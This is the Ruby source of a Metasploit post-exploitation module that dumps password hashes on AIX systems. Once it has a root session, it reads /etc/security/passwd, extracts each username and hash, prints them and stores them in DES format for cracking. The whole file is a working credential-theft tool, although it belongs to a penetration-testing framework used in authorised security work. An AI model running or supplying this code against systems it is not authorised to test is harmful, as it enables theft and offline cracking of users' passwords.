1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::Priv
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'AIX Gather Dump Password Hashes',
15
        'Description' => %q{Post module to dump the password hashes for all users on an AIX system.},
16
        'License' => MSF_LICENSE,
17
        'Author' => ['theLightCosine'],
18
        'Platform' => [ 'aix' ],
19
        'SessionTypes' => [ 'shell' ],
20
        'Notes' => {
21
          'Stability' => [CRASH_SAFE],
22
          'SideEffects' => [],
23
          'Reliability' => []
24
        }
25
      )
26
    )
27
  end
28

29
  def run
30
    fail_with(Failure::NoAccess, 'You must run this module as root!') unless is_root?
31

32
    passwd_file = read_file('/etc/security/passwd')
33

34
    username = ''
35
    hash = ''
36

37
    passwd_file.each_line do |line|
38
      user_line = line.match(/(\w+):/)
39
      if user_line
40
        username = user_line[1]
41
      end
42

43
      hash_line = line.match(/password = (\w+)/)
44
      if hash_line
45
        hash = hash_line[1]
46
      end
47

48
      next unless hash.present?
49

50
      print_good("#{username}:#{hash}")
51
      credential_data = {
52
        jtr_format: 'des',
53
        origin_type: :session,
54
        post_reference_name: refname,
55
        private_type: :nonreplayable_hash,
56
        private_data: hash,
57
        session_id: session_db_id,
58
        username: username,
59
        workspace_id: myworkspace_id
60
      }
61
      create_credential(credential_data)
62
      username = ''
63
      hash = ''
64
    end
65
  end
66
end
67

68